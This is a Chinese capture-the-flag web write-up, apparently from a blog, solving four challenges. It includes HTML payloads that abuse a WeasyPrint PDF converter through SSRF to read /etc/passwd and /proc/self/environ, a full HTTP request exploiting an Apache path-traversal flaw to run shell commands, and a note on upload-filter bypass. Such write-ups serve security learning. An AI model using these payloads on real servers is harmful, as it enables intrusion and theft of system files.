1.真亦假,假亦真:
六秒之后跳转到如下页面:
果真是标准一句话木马,尝试传参,但却无法正常执行。
扫目录,发现/flag,访问之即可获取到flag
2.CSDN_TO_PDFV1.2
网站功能大概就是将目标网页转换为PDF文件,但URL中必须包含blog.csdn.net
,错一丁点都不行
包含指定字符串时,页面正常回显。
不包含指定字符串时,会提示:“invalid URL”'
参考:https://blog.csdn.net/RABCDXB/article/details/122659054,目标网站可能存在SSRF漏洞,可将blog.csdn.net
作为GET传参,成功绕过。
没有VPS,可以尝试使用花生壳做内网穿透。先尝试做一个指纹识别,使用nc监听相应端口,让目标网站发起网络请求
可以看到UA头是:WeasyPrint 61.2,WeasyPrint是一个用于HTML和CSS的可视化渲染引擎,可以将HTML文档导出为打印标准的PDF文件。而WeasyPrint 重新定义了一组 html 标签,包括 img、embed、object 等,当使用link标签时,WeasyPrint会尝试引用(读取)目标链接所指向的内容并附加在PDF文档内。
可参考:
https://nahamsec.com/posts/my-expense-report-resulted-in-a-server-side-request-forgery-ssrf-on-lyft
在VPS新建一个index.html,可以绕过对于html字符串的过滤,内容为:
<!DOCTYPE html>
<html>
<head>
<title>cai</title>
</head>
<body>
<link rel = "attachment" href = "file:///etc/passwd">
</body>
</html>
再次让目标服务器访问我们的VPS,读取网页内容并转换为PDF
使用binwalk分离该PDF文件,同时查看文件内容
可以看到成功读取了/etc/passwd文件内容,下一步就是读取flag文件,flag在/proc/self/environ
文件中,修改html文件内容如下:
<!DOCTYPE html>
<html>
<head>
<title>cai</title>
</head>
<body>
<link rel = "attachment" href = "file:///proc/self/environ">
</body>
</html>
以同样的方式处理PDF文件,成功读取flag
3.MYAPACHE
某杯的某个题目
apache2.4.5 存在命令执行漏洞。
参考:https://www.cnblogs.com/1zzZ/p/17637671.html
POC:
POST /cgi-bin/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/%2e%%32%65/bin/sh HTTP/1.1
Host: 192.168.19.107:8002
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 8
echo; ls /
查看flag文件内容
base64解码,保存文件内容。
压缩包文件,需要密码。密码在/cgi-bin/test-cgi,密码是20240202ctf
4.ls就可以了
文件上传绕过,文件类型检测可用Gif绕过。
标签:赛道,web,文件,32%,flag,ctf,PDF,com,2e% From: https://blog.csdn.net/jxiang213/article/details/143441874